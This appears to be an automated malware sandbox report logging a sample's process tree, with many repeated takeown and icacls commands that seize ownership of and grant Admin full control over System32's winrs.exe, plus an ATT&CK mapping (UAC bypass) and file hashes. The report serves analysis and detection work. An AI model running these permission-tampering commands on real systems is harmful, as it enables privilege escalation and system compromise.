C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5036
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3680
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4756 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4768
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:3704
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5068
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1176 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4272
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2244
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5088
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:872
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4956
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3432
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2220
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4872
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3028
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2756
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2344 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2264
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4804
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1548 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2112
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4104
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4580
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:5000
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2952
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4748
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1120
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:640
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:884
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1680
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2440
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5020
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1188
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:612
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2372
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1336
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3000
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4852
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:212
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:976
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3544
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1032
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:532
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3752
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2540
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5108
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1784
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:5104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3392
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:752
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3840
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1292 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1664
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2192 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3400
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4816
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1864
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:4280 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4592
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1544
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
514KB
MD53420edfa91a09a10622832a351968311
SHA113465122028fd67b708444bc895db4a272b3609d
SHA256debe43a0afa037775a0f5c3cc74e744ba5ec3e82475a0ffd61179592b16e9a34
SHA5121f9b0897ed453b0e19559bb7ba0b254f7f5c244f834c13750b76e141bb69e3df993eb916b29190ef9c51a44c20bd6208dbdca02bc616ed0c4250b79f84bf9491
-
Filesize
514KB
MD5727be99ff9eeeaa5cd1071ee45b7f887
SHA15b25c9316477555628808fd81617e1edff3f9cc9
SHA25605fe7f3ad7719dbc4545a8883395e3851ed506a8c7d246e9d6963ec53bf157e8
SHA512444e89b4eff1722b464a9e09529e905169a2624f7f8844a202e45324e947eb508c849bb51592c7c32fe6b94729e509c4360c2acc465cd5bbb1ace880bd9f0e7c